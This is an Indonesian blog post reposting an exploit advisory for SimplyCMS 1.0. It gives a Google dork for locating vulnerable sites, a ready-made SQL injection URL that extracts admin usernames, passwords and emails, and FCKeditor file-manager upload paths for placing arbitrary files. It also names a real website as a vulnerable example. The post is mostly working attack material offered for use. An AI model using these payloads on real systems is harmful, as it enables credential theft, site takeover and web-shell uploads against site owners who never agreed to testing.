SimplyCMS 1.0 Sql Injection/Arbitrary File Upload Vulnerabilties

Halo Semuanya Saya Akan Share Bug Yang Baru saya DApat hasil jalan jalan di google


SimplyCMS 1.0  Sql Injection/Arbitrary File Upload Vulnerabilties
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.dsthosting.com/
.:. Drok           : inurl:"index.php?subid=" "Powered by DST - SimplyCMS"
.:. Gr34T$ T0 [aboud-el]
####################################################################

===[ Exploit ]===

Sql Injection
==============

http://SITE/index.php?subid=7[sql]

http://SITE/index.php?subid=7'+and+1=2+union+select+group_concat(ct,0x3a,username,0x3a,adminpass,0x3a,adminemail)+from+adminconf-- -

WEBSITE LOGIN: http://SITE/cms/index.php

Multiple Arbitrary File Upload
===============================

http://SITE/cms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php << untuk upload file bertipe gambar
http://SITE/cms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php << untuk upload file bertipe documents

http://SITE/cms/FCKeditor/editor/filemanager/browser/default/connectors/test.html
http://SITE/cms/FCKeditor/editor/filemanager/upload/test.html
http://SITE/cms/FCKeditor/editor/filemanager/browser/default/frmupload.html

Your File:

http://SITE/cms/myFiles/Image/ << untuk melihat isi file gambar
http://SITE/cms/myFiles/File/  << untuk melihat isi file documents

contoh site ada bugsnya :
http://www.mypinnacle.com.sg/cms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

Socializer Widget By Blogger Yard

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →